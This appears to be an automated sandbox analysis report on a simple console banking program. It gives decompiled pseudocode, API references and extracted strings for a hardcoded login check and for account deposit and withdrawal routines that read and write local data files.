                                              0x00d84d1c
                                              0x00d84d24
                                              0x00d84d29
                                              0x00d84d31
                                              0x00d84d3a
                                              0x00d84d41
                                              0x00d84d46
                                              0x00d84d4a
                                              0x00d84d4e
                                              0x00d84d52
                                              0x00d84d59
                                              0x00d84d60
                                              0x00d84d67
                                              0x00d84d68
                                              0x00d84d6d
                                              0x00d84d73
                                              0x00d84d74
                                              0x00d84d79
                                              0x00d84d79
                                              0x00d84d81
                                              0x00d84d86
                                              0x00d84d87
                                              0x00d84d8f
                                              0x00d84d95
                                              0x00d84d96
                                              0x00d84db0
                                              0x00d84dba
                                              0x00d84dc2
                                              0x00d84dc7
                                              0x00d84dcf
                                              0x00d84dd4
                                              0x00d84dd9
                                              0x00d84dde
                                              0x00d84de6
                                              0x00d84de7
                                              0x00d84dec
                                              0x00d84df1
                                              0x00d84df2
                                              0x00d84dfa
                                              0x00d84e00
                                              0x00d84e01
                                              0x00d84e09
                                              0x00d84e12
                                              0x00d84e17
                                              0x00000000
                                              0x00d84e21
                                              0x00d84c19
                                              0x00d84c1c
                                              0x00000000
                                              0x00000000
                                              0x00d84e27

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D849A3
                                              • _wscanf.LIBCMT ref: 00D849B4
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _wprintf.LIBCMT ref: 00D849EC
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wprintf.LIBCMT ref: 00D84A0E
                                              • _wprintf.LIBCMT ref: 00D84A24
                                              • _wscanf.LIBCMT ref: 00D84A35
                                              • _swscanf.LIBCMT ref: 00D84AA2
                                              • _wprintf.LIBCMT ref: 00D84AF1
                                              • _wprintf.LIBCMT ref: 00D84B07
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820F2
                                              Strings
                                              • Are you sure you want to perform this tranasction? <Y/N>, xrefs: 00D84BFF
                                              • ACCOUNT.DAT, xrefs: 00D849C1
                                              • TEMP.DAT, xrefs: 00D84C3E
                                              • %s %s %s %s %.2f %s, xrefs: 00D84DE7
                                              • Withdraw from A/C number : , xrefs: 00D8499E
                                              • ACCOUNT.DAT, xrefs: 00D84C27
                                              • Sorry, the current balance is Rs. %.2f only!, xrefs: 00D84AEC
                                              • Given A/C number does not exits!, xrefs: 00D849E7
                                              • %s to be Withdrawn from A/C number : %s [%s], xrefs: 00D84B77
                                              • Transaction NOT completed!, xrefs: 00D84B02
                                              • Amount to be Withdrawn (in NRs.) : , xrefs: 00D84A1F
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D84A97
                                              • Cash+Withdrawn, xrefs: 00D84DDE
                                              • ACCOUNT.DAT, xrefs: 00D84A42
                                              • Confirm Transaction, xrefs: 00D84B3C
                                              • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00D84C93
                                              • [ %s ], xrefs: 00D84A09
                                              • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 00D84D68
                                              • Transaction completed successfully!, xrefs: 00D84E17
                                              • TRANSACTION.DAT, xrefs: 00D84DA3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
                                              • String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
                                              • API String ID: 427838879-2716176803
                                              • Opcode ID: aa227b98d819b58a5b03f839be7595d9e31bedd9317547cd2122e11f98559d88
                                              • Instruction ID: fe1c14c72a4f8320ea51918c358d5d4ad5009d04d1e269e3dd2926bd75b04aba
                                              • Opcode Fuzzy Hash: aa227b98d819b58a5b03f839be7595d9e31bedd9317547cd2122e11f98559d88
                                              • Instruction Fuzzy Hash: 8EC16EB2D40208AEDB11FBA5CC42FEEB778EF5A700F044659F60576181FA71A64C8B76
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D82290, Relevance: 57.9, APIs: 17, Strings: 16, Instructions: 198COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 72%
                                              			E00D82290(void* __edi, void* __esi, void* __fp0) {
				char _v5;
				char _v6;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v60;
				char _v92;
				void* __ebp;
				void* _t50;
				void* _t74;
				void* _t78;
				void* _t85;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t100;
				void* _t101;
				void* _t106;
				void* _t116;

				_t116 = __fp0;
				_t95 = __esi;
				_t94 = __edi;
				_v60 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_v20 = 0;
					E00D81250(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E00D870FC(_t85, _t94, _t95, 0);
					E00D81320(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
					E00D81250(0x17, 0xa);
					_push("Enter User name : ");
					E00D870FC(_t85, _t94, _t95, 0);
					E00D8732B("%s",  &_v92);
					E00D81250(0x17, 0xc);
					_push("Password        : ");
					E00D870FC(_t85, _t94, _t95, 0);
					_t100 = _t96 + 0x14;
					E00D81290(_t94, _t95,  &_v60);
					_v16 = _v16 + 1;
					_t110 = _v16 - 3;
					if(_v16 == 3) {
						E00D82080( &_v92, _t94, _t95, _t110, _t116);
						E00D81250(0x19, 8);
						_push(0xd9f224);
						E00D870FC(_t85, _t94, _t95, _t110);
						E00D81250(0x16, 0xb);
						_push("Press any key to exit the program...");
						E00D870FC(_t85, _t94, _t95, _t110);
						_t100 = _t100 + 8;
						E00D87751(0);
					}
					_t87 =  &_v92;
					_t50 = E00D881D0( &_v92, "ADMIN");
					_t101 = _t100 + 8;
					if(_t50 != 0) {
						L6:
						E00D82080(_t87, _t94, _t95, __eflags, _t116);
						E00D81250(0x19, 0xa);
						_push(0xd9f278);
						E00D870FC(_t85, _t94, _t95, __eflags);
						_t96 = _t101 + 4;
					} else {
						_t78 = E00D881D0( &_v60, "IOE");
						_t101 = _t101 + 8;
						if(_t78 != 0) {
							goto L6;
						} else {
							_v20 = 1;
						}
					}
					_t113 = _v20 - 1;
				} while (_v20 != 1);
				do {
					E00D82080(_t87, _t94, _t95, _t113, _t116);
					E00D81250(0x1e, 8);
					_push("1. Add User");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0xa);
					_push("2. Delete User");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0xc);
					_push("3. Edit User name / Password");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0xe);
					_push("4. View User Log");
					E00D870FC(_t85, _t94, _t95, _t113);
					E00D81250(0x1e, 0x10);
					_push("5. Exit");
					E00D870FC(_t85, _t94, _t95, _t113);
					_t106 = _t96 + 0x14;
					E00D81250(1, 0x11);
					_v24 = 0;
					while(1) {
						_t114 = _v24 - 0x4e;
						if(_v24 >= 0x4e) {
							break;
						}
						_push("_");
						E00D870FC(_t85, _t94, _t95, _t114);
						_t106 = _t106 + 4;
						_v24 = _v24 + 1;
					}
					E00D81250(0x17, 0x13);
					_push(" Press a number between the range [1 -5]  ");
					E00D870FC(_t85, _t94, _t95, __eflags);
					_t96 = _t106 + 4;
					_t89 = _v6 - 0x30;
					_v28 = _v6 - 0x30;
					_v12 = _v28;
					_v12 = _v12 - 1;
					__eflags = _v12 - 4;
					if(__eflags > 0) {
						E00D82080(_t89, _t94, _t95, __eflags, _t116);
						E00D81250(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 5!");
						E00D870FC(_t85, _t94, _t95, __eflags);
						E00D81250(0xf, 0xc);
						_push("Press ENTER to return to main menu...");
						_t74 = E00D870FC(_t85, _t94, _t95, __eflags);
						_t96 = _t96 + 8;
					} else {
						switch( *((intOrPtr*)(_v12 * 4 +  &M00D82548))) {
							case 0:
								_t74 = E00D82560(_t85, _t94, _t95, _t116);
								goto L23;
							case 1:
								E00D827A0(__ebx, __ecx, __edi, __esi, __fp0);
								goto L23;
							case 2:
								E00D82AB0(__ebx, __edi, __esi, __fp0);
								goto L23;
							case 3:
								E00D82E20(__ebx, __edx, __eflags, __fp0);
								goto L23;
							case 4:
								E00D82080(__ecx, __edi, __esi, __eflags, __fp0);
								E00D81250(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								E00D870FC(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(_v5 == 0x59) {
									L20:
									E00D87751(0);
								} else {
									__eflags = _v5 - 0x79;
									if(_v5 == 0x79) {
										goto L20;
									}
								}
								goto L23;
						}
					}
					L23:
					_t87 = 1;
					__eflags = 1;
				} while (1 != 0);
				return _t74;
			}
































                                              0x00d82290
                                              0x00d82290
                                              0x00d82290
                                              0x00d82296
                                              0x00d8229c
                                              0x00d8229f
                                              0x00d822a2
                                              0x00d822a5
                                              0x00d822a8
                                              0x00d822ab
                                              0x00d822ae
                                              0x00d822b1
                                              0x00d822b4
                                              0x00d822bb
                                              0x00d822c2
                                              0x00d822c2
                                              0x00d822cd
                                              0x00d822d2
                                              0x00d822d7
                                              0x00d822e7
                                              0x00d822f0
                                              0x00d822f5
                                              0x00d822fa
                                              0x00d8230b
                                              0x00d82317
                                              0x00d8231c
                                              0x00d82321
                                              0x00d82326
                                              0x00d8232d
                                              0x00d82338
                                              0x00d8233b
                                              0x00d8233f
                                              0x00d82341
                                              0x00d8234a
                                              0x00d8234f
                                              0x00d82354
                                              0x00d82360
                                              0x00d82365
                                              0x00d8236a
                                              0x00d8236f
                                              0x00d82374
                                              0x00d82374
                                              0x00d8237e
                                              0x00d82382
                                              0x00d82387
                                              0x00d8238c
                                              0x00d823ac
                                              0x00d823ac
                                              0x00d823b5
                                              0x00d823ba
                                              0x00d823bf
                                              0x00d823c4
                                              0x00d8238e
                                              0x00d82397
                                              0x00d8239c
                                              0x00d823a1
                                              0x00000000
                                              0x00d823a3
                                              0x00d823a3
                                              0x00d823a3
                                              0x00d823a1
                                              0x00d823c7
                                              0x00d823c7
                                              0x00d823d1
                                              0x00d823d1
                                              0x00d823da
                                              0x00d823df
                                              0x00d823e4
                                              0x00d823f0
                                              0x00d823f5
                                              0x00d823fa
                                              0x00d82406
                                              0x00d8240b
                                              0x00d82410
                                              0x00d8241c
                                              0x00d82421
                                              0x00d82426
                                              0x00d82432
                                              0x00d82437
                                              0x00d8243c
                                              0x00d82441
                                              0x00d82448
                                              0x00d8244d
                                              0x00d8245f
                                              0x00d8245f
                                              0x00d82463
                                              0x00000000
                                              0x00000000
                                              0x00d82465
                                              0x00d8246a
                                              0x00d8246f
                                              0x00d8245c
                                              0x00d8245c
                                              0x00d82478
                                              0x00d8247d
                                              0x00d82482
                                              0x00d82487
                                              0x00d8248e
                                              0x00d82491
                                              0x00d82497
                                              0x00d824a0
                                              0x00d824a3
                                              0x00d824a7
                                              0x00d82505
                                              0x00d8250e
                                              0x00d82513
                                              0x00d82518
                                              0x00d82524
                                              0x00d82529
                                              0x00d8252e
                                              0x00d82533
                                              0x00d824a9
                                              0x00d824ac
                                              0x00000000
                                              0x00d824b3
                                              0x00000000
                                              0x00000000
                                              0x00d824ba
                                              0x00000000
                                              0x00000000
                                              0x00d824c1
                                              0x00000000
                                              0x00000000
                                              0x00d824c8
                                              0x00000000
                                              0x00000000
                                              0x00d824cf
                                              0x00d824d8
                                              0x00d824dd
                                              0x00d824e2
                                              0x00d824e7
                                              0x00d824ea
                                              0x00d824ee
                                              0x00d824f1
                                              0x00d824fc
                                              0x00d824fe
                                              0x00d824f3
                                              0x00d824f7
                                              0x00d824fa
                                              0x00000000
                                              0x00000000
                                              0x00d824fa
                                              0x00000000
                                              0x00000000
                                              0x00d824ac
                                              0x00d82536
                                              0x00d82536
                                              0x00d8253b
                                              0x00d8253b
                                              0x00d82546

                                              APIs
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D822D7
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8133D
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8137B
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D8139C
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81410
                                                • Part of subcall function 00D81320: _wprintf.LIBCMT ref: 00D81433
                                              • _wprintf.LIBCMT ref: 00D822FA
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
                                                • Part of subcall function 00D870FC: __ftbuf.LIBCMT ref: 00D87176
                                              • _wscanf.LIBCMT ref: 00D8230B
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                              • _wprintf.LIBCMT ref: 00D82321
                                                • Part of subcall function 00D81290: _wprintf.LIBCMT ref: 00D812C9
                                              • _wprintf.LIBCMT ref: 00D82354
                                              • _wprintf.LIBCMT ref: 00D823BF
                                                • Part of subcall function 00D82560: _wprintf.LIBCMT ref: 00D825CD
                                                • Part of subcall function 00D82560: _wscanf.LIBCMT ref: 00D825DF
                                                • Part of subcall function 00D82560: _swscanf.LIBCMT ref: 00D82621
                                                • Part of subcall function 00D82560: _wprintf.LIBCMT ref: 00D82671
                                              • _wprintf.LIBCMT ref: 00D8236A
                                                • Part of subcall function 00D87751: _doexit.LIBCMT ref: 00D8775B
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820F2
                                              • _wprintf.LIBCMT ref: 00D823E4
                                              • _wprintf.LIBCMT ref: 00D823FA
                                              • _wprintf.LIBCMT ref: 00D82410
                                              • _wprintf.LIBCMT ref: 00D82426
                                              • _wprintf.LIBCMT ref: 00D8243C
                                              • _wprintf.LIBCMT ref: 00D8246A
                                              • _wprintf.LIBCMT ref: 00D82482
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                              Strings
                                              • 1. Add User, xrefs: 00D823DF
                                              • IOE, xrefs: 00D8238E
                                              • Press ENTER to return to main menu..., xrefs: 00D82529
                                              • Press any key to exit the program..., xrefs: 00D82365
                                              • Only THREE attempts shall be allowed to enter username and password., xrefs: 00D822D2
                                              • Enter User name : , xrefs: 00D822F5
                                              • Your input is out of range! Enter a choice between 1 to 5!, xrefs: 00D82513
                                              • 2. Delete User, xrefs: 00D823F5
                                              • Password : , xrefs: 00D8231C
                                              • 4. View User Log, xrefs: 00D82421
                                              • ADMIN, xrefs: 00D82379
                                              • 5. Exit, xrefs: 00D82437
                                              • N, xrefs: 00D8245F
                                              • Are you sure you want to exit? <Y/N> : , xrefs: 00D824DD
                                              • Press a number between the range [1 -5] , xrefs: 00D8247D
                                              • 3. Edit User name / Password, xrefs: 00D8240B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.382981299.0000000000D81000.00000020.00020000.sdmp, Offset: 00D80000, based on PE: true
                                              • Associated: 00000002.00000002.382951504.0000000000D80000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383023162.0000000000D98000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383040167.0000000000D9F000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.383052051.0000000000DA5000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
                                              • String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
                                              • API String ID: 3691436685-2046970424
                                              • Opcode ID: ca8cde14146e4d7957cd74c70c0c3fb58cb187512071ab2955145862401ef74e
                                              • Instruction ID: e5d31353c2e22761849bf78e07227f3d3e26a12d6f3722797f4994def8c0ca21
                                              • Opcode Fuzzy Hash: ca8cde14146e4d7957cd74c70c0c3fb58cb187512071ab2955145862401ef74e
                                              • Instruction Fuzzy Hash: 57613EB4E84304EAEB10B7A49C47BAE7664EF51B15F240034F645B91C2EAB1A24C977B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00D845E0, Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 252COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 44%
                                              			E00D845E0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v280;
				char _v360;
				char _v440;
				void* __ebp;
				void* _t57;
				char _t73;
				intOrPtr _t75;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t103;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t129;
				intOrPtr _t134;
				void* _t137;
				void* _t141;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t163;

				_t170 = __fp0;
				_t168 = __eflags;
				_t136 = __esi;
				_t135 = __edi;
				_t101 = __ebx;
				_v16 = 0;
				E00D82080(__ecx, __edi, __esi, __eflags, __fp0);
				E00D81250(5, 0xa);
				_push("Deposit to A/C number            : ");
				E00D870FC(__ebx, __edi, __esi, __eflags);
				E00D8732B("%s",  &_v28);
				 *0xda2f28 = E00D86E91("ACCOUNT.DAT", "r");
				_t103 =  *0xda2f28; // 0x0
				_push(_t103);
				E00D86D56(__ebx, _t135, _t136, _t168);
				_t141 = _t137 + 0x18;
				_t169 = _v16;
				if(_v16 == 0) {
					E00D82080(_t103, _t135, _t136, _t169, __fp0);
					E00D81250(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E00D870FC(_t101, _t135, _t136, _t169);
				}
				E00D81250(0x32, 0xa);
				_push( &_v244);
				_push("[ %s ]");
				E00D870FC(_t101, _t135, _t136, __eflags);
				E00D81250(5, 0xc);
				_push("Amount to be Deposited (in NRs.) : ");
				E00D870FC(_t101, _t135, _t136, __eflags);
				E00D8732B("%f",  &_v12);
				E00D82080(_t103, _t135, _t136, __eflags, __fp0);
				E00D81250(0x1e, 0xa);
				_push("Confirm Transaction");
				_t57 = E00D870FC(_t101, _t135, _t136, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E00D81810(_t57,  &_v280);
				E00D81250(3, 0xc);
				_push( &_v244);
				_push( &_v28);
				E00D870FC(_t101, _t135, _t136, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E00D81AD0( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
				E00D880E0( &_v360,  &_v440);
				E00D880E0( &_v360, "]");
				E00D81250(0x28 - (E00D88260( &_v360) >> 1), 0xe);
				_push( &_v360);
				E00D871C9(_t101, _t135, _t136, __eflags);
				E00D81250(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E00D870FC(_t101, _t135, _t136, __eflags);
				_t151 = _t141 + 0x24 - 8 + 0x1c;
				_t73 = _v5;
				__eflags = _t73 - 0x59;
				if(_t73 == 0x59) {
					L4:
					 *0xda2f28 = E00D86E91("ACCOUNT.DAT", "r");
					_t75 = E00D86E91("TEMP.DAT", "a");
					_t153 = _t151 + 0x10;
					 *0xda2f24 = _t75;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t129 =  *0xda2f28; // 0x0
						_t80 = E00D86FC1(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t154 = _t153 + 0x38;
						__eflags = _t80 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t93 = E00D881D0( &_v208,  &_v28);
						_t163 = _t154 + 8;
						__eflags = _t93;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("addss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t134 =  *0xda2f24; // 0x0
						_push(_t134);
						E00D86EA6(_t101, _t135, _t136, __eflags);
						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
					}
					_t81 =  *0xda2f24; // 0x0
					_push(_t81);
					E00D86D56(_t101, _t135, _t136, __eflags);
					_t113 =  *0xda2f28; // 0x0
					_push(_t113);
					E00D86D56(_t101, _t135, _t136, __eflags);
					 *0xda2f28 = E00D86E91("TRANSACTION.DAT", "a");
					E00D883B7(__eflags, 0xda2f30);
					_push(0xda2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0xda2f30);
					_push(0xda2f40);
					_push("Cash+Deposited");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t86 =  *0xda2f28; // 0x0
					_push(_t86);
					E00D86EA6(_t101, _t135, _t136, __eflags);
					_t114 =  *0xda2f28; // 0x0
					_push(_t114);
					E00D86D56(_t101, _t135, _t136, __eflags);
					E00D82080(_t114, _t135, _t136, __eflags, _t170);
					E00D81250(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E00D870FC(_t101, _t135, _t136, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L4;
				}
				return _t73;
			}










































                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e0
                                              0x00d845e9
                                              0x00d845f0
                                              0x00d845f9
                                              0x00d845fe
                                              0x00d84603
                                              0x00d84614
                                              0x00d8462e
                                              0x00d84633
                                              0x00d84639
                                              0x00d8463a
                                              0x00d8463f
                                              0x00d84642
                                              0x00d84646
                                              0x00d84648
                                              0x00d84651
                                              0x00d84656
                                              0x00000000
                                              0x00d84660
                                              0x00d8466c
                                              0x00d84677
                                              0x00d84678
                                              0x00d8467d
                                              0x00d84689
                                              0x00d8468e
                                              0x00d84693
                                              0x00d846a4
                                              0x00d846ac
                                              0x00d846b5
                                              0x00d846ba
                                              0x00d846bf
                                              0x00d846c4
                                              0x00d846c9
                                              0x00d846d5
                                              0x00d846de
                                              0x00d846e9
                                              0x00d846ed
                                              0x00d846fa
                                              0x00d84709
                                              0x00d84711
                                              0x00d84716
                                              0x00d84729
                                              0x00d8473d
                                              0x00d84760
                                              0x00d8476b
                                              0x00d8476c
                                              0x00d84778
                                              0x00d8477d
                                              0x00d84782
                                              0x00d84787
                                              0x00d8478a
                                              0x00d8478e
                                              0x00d84791
                                              0x00d847a0
                                              0x00d847b2
                                              0x00d847c1
                                              0x00d847c6
                                              0x00d847c9
                                              0x00d847ce
                                              0x00d847d1
                                              0x00d847d5
                                              0x00d847d9
                                              0x00d847dd
                                              0x00d847e4
                                              0x00d847e8
                                              0x00d847ec
                                              0x00d847f0
                                              0x00d847f4
                                              0x00d847fb
                                              0x00d84802
                                              0x00d8480f
                                              0x00d84816
                                              0x00d8481b
                                              0x00d8481e
                                              0x00d84821
                                              0x00000000
                                              0x00000000
                                              0x00d84832
                                              0x00d84837
                                              0x00d8483a
                                              0x00d8483c
                                              0x00d8483e
                                              0x00d84843
                                              0x00d84848
                                              0x00d84848
                                              0x00d8484d
                                              0x00d84852
                                              0x00d84857
                                              0x00d8485c
                                              0x00d84864
                                              0x00d84869
                                              0x00d84871
                                              0x00d84876
                                              0x00d8487e
                                              0x00d84887
                                              0x00d8488e
                                              0x00d84893
                                              0x00d84897
                                              0x00d8489b
                                              0x00d8489f
                                              0x00d848a6
                                              0x00d848ad
                                              0x00d848b4
                                              0x00d848b5
                                              0x00d848ba
                                              0x00d848c0
                                              0x00d848c1
                                              0x00d848c6
                                              0x00d848c6
                                              0x00d848ce
                                              0x00d848d3
                                              0x00d848d4
                                              0x00d848dc
                                              0x00d848e2
                                              0x00d848e3
                                              0x00d848fd
                                              0x00d84907
                                              0x00d8490f
                                              0x00d84914
                                              0x00d8491c
                                              0x00d84921
                                              0x00d84926
                                              0x00d8492b
                                              0x00d84933
                                              0x00d84934
                                              0x00d84939
                                              0x00d8493e
                                              0x00d8493f
                                              0x00d84947
                                              0x00d8494d
                                              0x00d8494e
                                              0x00d84956
                                              0x00d8495f
                                              0x00d84964
                                              0x00000000
                                              0x00d8496e
                                              0x00d84797
                                              0x00d8479a
                                              0x00000000
                                              0x00000000
                                              0x00d84974

                                              APIs
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D8209F
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820DE
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D820FF
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D8210C
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82128
                                                • Part of subcall function 00D82080: __wstrtime.LIBCMT ref: 00D82135
                                                • Part of subcall function 00D82080: _wprintf.LIBCMT ref: 00D82168
                                                • Part of subcall function 00D81250: GetStdHandle.KERNEL32(000000F5,00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81271
                                                • Part of subcall function 00D81250: SetConsoleCursorPosition.KERNEL32(00000000,?,00D81333,?,?,?,00D811CF), ref: 00D81278
                                              • _wprintf.LIBCMT ref: 00D84603
                                              • _wscanf.LIBCMT ref: 00D84614
                                                • Part of subcall function 00D8732B: _vwscanf.LIBCMT ref: 00D8733C
                                                • Part of subcall function 00D86E91: __fsopen.LIBCMT ref: 00D86E9C
                                              • _wprintf.LIBCMT ref: 00D8465B
                                                • Part of subcall function 00D870FC: __stbuf.LIBCMT ref: 00D87148
                                                • Part of subcall function 00D870FC: __output_s_l.LIBCMT ref: 00D87162
